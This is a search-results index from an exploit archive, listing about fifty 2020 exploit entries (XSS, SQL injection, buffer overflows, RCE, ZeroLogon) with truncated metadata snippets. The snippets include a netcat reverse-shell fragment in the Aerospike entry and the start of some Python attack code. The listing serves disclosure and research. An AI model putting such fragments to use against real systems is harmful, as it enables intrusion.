47904 matches found
Pure-FTPd 1.0.48 - Remote Denial of Service
Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service Date: 2020. nov. 26., 09:32:17 CET Exploit Author: xynmaps Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/ Software Link: https://github.com/jedisct1/pure-ftpd/ Version: 1.0.48 Tested on: Parrot Security OS 5.9.0 encoding=utf...
Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution
Exploit Title: Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution Date: 2020-08-13 Exploit Author: Loke Hui Yi Vendor Homepage: https://razerid.razer.com Software Link: http://rzr.to/synapse-3-pc-download Version: , and create an exe file with the same application's name in th...
osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting
Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting Date: 2020-11-19 Exploit Author: Emre Aslan Vendor Homepage: https://www.oscommerce.com/ Version: 2.3.4.1 Tested on: Windows & XAMPP == Tutorial https://HOST/catalog/admin/newsletters.php?action=new 3- Enter the XSS paylo...
Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path
Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path Date: 2020-11-24 Exploit Author: Luis Sandoval Vendor Homepage: https://www.wondershare.com/ Software Link: https://www.wondershare.com/drfone/ Version: 10.7.1.321 Tested on: Windows 10 Hom...
SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow
Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow Date: 18-Sep-2020 Exploit Author: Abdessalam kingA.salam Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7,windows...
WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting
Exploit Title: WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting Date: 20-11-2020 Exploit Author: Mayur Parmar Vendor Homepage: https://www.wondercms.com/ Version: 3.1.3 Tested on: PopOS Stored Cross-site scriptingXSS: Stored attacks are those where the injected script is permanently store...
OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting Date: 24-11-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.opencart.com/ Software Link: https://www.opencart.com/index.php?route=cms/download Version: 3.0.3.6 Tested on: Windows 10/Kali Linux CVE:...
OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated)
Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting Authenticated Date: 24-11-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.opencart.com/ Software Link: https://www.opencart.com/index.php?route=cms/download Version: 3.0.3.6 Tested on: Window...
Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)
Exploit Title: Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE Authenticated Date: 5 Aug 2020 Exploit Author: maj0rmil4d Vendor Homepage: http://www.seowonintech.co.kr/en/ Hardware Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&bigkindB05&middlekindB0529 Version: 1.0.11 Possibly al...
ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Zeroshell 3.9.0 Remote Command Execution', 'Description' = %q This module exploits an unauthenticated command injection vulnerability found in...
nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting
Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting Date: 24-11-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.nopcommerce.com/ Version: 4.30 Tested on: Windows 10/Kali Linux CVE: CVE-2020-29475 Stored Cross-site scriptingXSS: Stored XSS, also...
Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service Google Dork: "Apache OpenMeetings DOS" Date: 2020-08-28 Exploit Author: SunCSR ThienNV - Sun Cyber Security Research Vendor Homepage: https://openmeetings.apache.org/ Software Link: https://openmeetings.apache.org/ Version:...
docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow SEH Egghunter Date: 2020-07-26 Exploit Author: MasterVlad Vendor Homepage: http://www.verypdf.com Software Link: http://dl.verypdf.net/docprintprosetup.exe Version: 8.0 Vulnerability Type: Local Buffer Overflow Tested on: Windows 7 32-bi...
TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass
Exploit Title: TP-Link TL-WA855RE V5200415 - Device Reset Auth Bypass Date: 2020/07/29 Exploit Author: malwrforensics Vendor Homepage: https://tp-link.com Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855REV5200415.zip Version: TL-WA855REUSV5200415 Tested on: N/A CVE :...
Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)
Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow SEH Discovery by: Luis Martinez Discovery Date: 2020-11-22 Vendor Homepage: http://www.boxoft.com/ Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe Tested Version: 2.3.0 Vulnerability Type: Local Buffer Overflo...
LifeRay 7.2.1 GA2 - Stored XSS
Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS Date: 10/05/2020 Exploit Author: 3ndG4me Vendor Homepage: https://www.liferay.com/ Software Link: https://www.liferay.com/ Version: 7.1.0 - 7.2.1 GA2 REQUIRED Tested on: Debian Linux CVE : CVE-2020-7934 Public Exploit/Whitepaper:...
VTiger v7.0 CRM - 'To' Persistent XSS
Exploit Title: VTiger v7.0 CRM - 'To' Persistent XSS Date: 2020-11-18 Exploit Vulnerability-Lab Vendor Homepage: https://www.vtiger.com/open-source-crm/download-open-source/ Software Link: https://sourceforge.net/projects/vtigercrm/files/ Version: v7.0 Document Title: =============== VTiger v7.0...
WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting Date: 20-11-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.wondercms.com/ Version: 3.1.3 Tested on: Windows 10/Kali Linux CVE: CVE-2020-29233 Stored Cross-site scriptingXSS: Stored XSS, also...
IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow Exploit Author: Paolo Stagno aka VoidSec Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG77.1.0/com.ibm.itsm.tsm.doc/welcome.html Version: 5.2.0.1...
Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Free MP3 CD Ripper 2.6 %q This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8. By constructing a specially crafted...
Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit Date: 17.09.2020 Vendor Homepage: http://www.boxoft.com/ Software Link: http://www.boxoft.com/convert-master/setupboxoft-conver=t-master.exe Exploit Author: Achilles Tested Version: 1.3.0 Tested on: Windows 7 x64 1.- Run python...
Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution SEH Date: November 19, 2020 Exploit Author: Vincent Wolterman Vendor Homepage: https://www.zortam.com/index.html Software Link: https://www.zortam.com/download.html Version: 27.60 Tested on: Windows 7 Professional SP 1 Build 760...
Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)
Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow PoC Date: November 18, 2020 Exploit Author: Vincent Wolterman Vendor Homepage: http://www.internetdownloadmanager.com/ Software Link: http://www.internetdownloadmanager.com/download.html Version:...
M/Monit 3.7.4 - Privilege Escalation
Title: M/Monit 3.7.4 - Privilege Escalation Author: Dolev Farhi Date: 2020-07-09 Vendor Homepage: https://mmonit.com/ Version : 3.7.4 import sys import requests url = 'http://youriphere:8080' username = 'test' password = 'test123' sess = requests.Session sess.gethost def login: print'Attempting t...
M/Monit 3.7.4 - Password Disclosure
Title: M/Monit 3.7.4 - Password Disclosure Author: Dolev Farhi Date: 2020-07-09 Vendor Homepage: https://mmonit.com/ Version : 3.7.4 import sys import requests url = 'http://youriphere:8080' username = 'test' password = 'test123' sess = requests.Session sess.gethost def login: print'Attempting to...
Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting
Exploit Title: Nagios Log Server 2.1.7 - 'snapshotname' Persistent Cross-Site Scripting Date: 31.08.2020 Exploit Author: Emre ÖVÜNÇ Vendor Homepage: https://www.nagios.com/ Software Link: https://www.nagios.com/products/nagios-log-server/ Version: 2.1.7 Tested on: Linux/ISO Link:...
PESCMS TEAM 2.3.2 - Multiple Reflected XSS
Exploit Title: PESCMS TEAM 2.3.2 - Multiple Reflected XSS Date: 2020-11-18 Exploit Author: icekam Vendor Homepage: https://www.pescms.com/ Software Link: https://github.com/lazyphp/PESCMS-TEAM Version: PESCMS Team 2.3.2 CVE: CVE-2020-28092 PESCMS Team 2.3.2 has multiple reflected XSS via the id...
TestBox CFML Test Framework 4.1.0 - Directory Traversal
Title: TestBox CFML Test Framework 4.1.0 - Directory Traversal Author: Darren King Date: 2020-07-23 Vendor Homepage: https://www.ortussolutions.com/products/testbox Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 Version : 2.3.0 through to 4.1.0 Tested on: Adob...
TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution
Title: TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution Author: Darren King Date: 2020-07-23 Vendor Homepage: https://www.ortussolutions.com/products/testbox Software Link: https://www.ortussolutions.com/parent/download/testbox?version=3.1.0 Version : 2.4.0 throu...
Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure Date: 17th November 2020 Exploit Author: Nitesh Surana Vendor Homepage: https://www.gxgroup.eu/ont-products/ Version: P4410-V2-1.34H Tested on: Windows/Kali CVE : CVE-2020-25988 import upnpy upnp = upnpy.UPnP Discover UPnP...
Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification
Exploit Title: Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification Google Dork: intitle:"Please Login" "Use FTM Push" Date: 15/11/2020 Exploit Author: Ricardo Longatto Details: This exploit allow change users password from SSLVPN web portal Vendor Homepage:...
Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
Exploit Title: Gitlab 12.9.0 - Arbitrary File Read Authenticated Google Dork: - Date: 11/15/2020 Exploit Author: Jasper Rasenberg Vendor Homepage: https://about.gitlab.com Software Link: https://about.gitlab.com/install Version: tested on gitlab version 12.9.0 Tested on: Kali Linux 2020.3 You can...
Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection
Exploit Title: Gemtek WVRTM-127ACN 01.01.02.141 - Authenticated Arbitrary Command Injection Date: 13/09/2020 Exploit Author: Gabriele Zuddas Version: 01.01.02.127, 01.01.02.141 CVE : CVE-2020-24365 Service Provider : Linkem Product Name : LTE CPE Model ID : WVRTM-127ACN Serial ID : GMK17041801108...
xuucms 3 - 'keywords' SQL Injection
Exploit Title: xuucms 3 - 'keywords' SQL Injection Date: 2020-11-18 Exploit Author: icekam Vendor Homepage: https://www.cxuu.top/ Software Link: https://github.com/cbkhwx/cxuucmsv3 Version: cxuucms - v3 CVE : CVE-2020-28091 SQL injection exists in search.php. For details, please refer to:...
BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery
Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery Date: 2020-09-11 Exploit Author: RedTeam Pentesting GmbH Vendor Homepage: https://bigbluebutton.org/ Version: BigBlueButton 2.2.25 RedTeam Pentesting discovered a vulnerability in the BigBlueButton web...
ZeroLogon - Netlogon Elevation of Privilege
Exploit Title: ZeroLogon - Netlogon Elevation of Privilege Date: 2020-10-04 Exploit Author: West Shepherd Vendor Homepage: https://www.microsoft.com Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 Tested on: Microsof...
Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting (Authenticated)
Exploit Title : Wordpress Plugin WPForms 1.6.3.1 - Persistent Cross Site Scripting Authenticated Exploit Author : ZwX Exploit Date : 2020-10-23 Vendor Homepage : https://wpforms.com/ Download Plugin : https://downloads.wordpress.org/plugin/wpforms-lite.1.6.3.1.zip + Description Vulnerability:...
Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
Exploit Title: Joomla Plugin Simple Image Gallery Extended SIGE 3.5.3 - Multiple Vulnerabilities Exploit Author: Vulnerability-Lab Date: 2020-11-11 Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended...
Aerospike Database 5.1.0.3 - OS Command Execution
Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...
Apache Struts 2.5.20 - Double OGNL evaluation
Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation Date: 08/18/2020 Exploit Author: West Shepherd Vendor Homepage: https://struts.apache.org/download.cgi Version: Struts 2.0.0 - Struts 2.5.20 S2-059 CVE : CVE-2019-0230 Credit goes to reporters Matthias Kaiser, Apple InformationSecurity,...
LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
Exploit Title: Huawei LCDService 1.0.1.0 - 'LCDService' Unquote Service Path Date: 2020-11-07 Exploit Author: Gerardo González Vendor Homepage: https://consumer.huawei.com/mx Software Link: https://consumer.huawei.com/mx Version: 1.0.1.0 Tested on: Windows 10 Home Single Language x64 Esp Step to...
Microsoft Internet Explorer 11 - Use-After-Free
Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free Date: 2020-05-07 Exploit Author: maxpl0it Vendor Homepage: https://www.microsoft.com/ Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx Version: IE 8, 9, 10, and 11 Tested on: Windows 7 x64 CVE :...
Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
Exploit Title: Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting Exploit Author: Vulnerability-Lab Date: 2020-11-12 Vendor Homepage: https://froxlor.org/ Software Link: https://froxlor.org/download/ Version: 0.10.16 Document Title: =============== Froxlor v0.10.16 ...
SugarCRM 6.5.18 - Persistent Cross-Site Scripting
Exploit Title: SugarCRM 6.5.18 - Persistent Cross-Site Scripting Exploit Author: Vulnerability-Lab Date: 2020-11-16 Vendor Homepage: https://www.sugarcrm.com Version: 6.5.18 Document Title: =============== SugarCRM v6.5.18 - Contacts Persistent Cross Site Web Vulnerability References Source:...
EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass
Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass Date: 17-11-2020 Exploit Author: Kislay Kumar Vendor Homepage: http://egavilanmedia.com Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-pane=l/ Version:...
WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting
Exploit Title: WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting Exploit Author: Vulnerability-Lab Date: 2020-11-13 Vendor Homepage: https://wordpress.org/plugins/buddypress/ Version: 6.2.0 Document Title: =============== Buddypress v6.2.0 WP Plugin - Persistent Web Vulnerabilit...
Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection
Exploit Title: Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection Google Dork: N/A Date: 11/16/2020 Exploit Author: Ramil Mustafayev Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-doctor-appointment-booking-system-php-and-mysql/ Software...
Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)
Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection Authenticated Date: 2020-11-14 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html Software...
Car Rental Management System 1.0 - Remote Code Execution (Authenticated)
Exploit Title: Car Rental Management System 1.0 - Remote Code Execution Authenticated Date: 2020-11.13 Exploit Author: Mehmet Kelepçe / Gais Cyber Security Author ID: 8763 Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html...
PMB 5.6 - 'chemin' Local File Disclosure
Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure Date: 2020-10-13 Google Dork: inurl:opaccss Exploit Author: 41-trk Tarik Bakir Vendor Homepage: http://www.sigb.net Software Link: http://forge.sigb.net/redmine/projects/pmb/files Affected versions : = 5.6 Tested on: Ubuntu 18.04.1 The PMB G...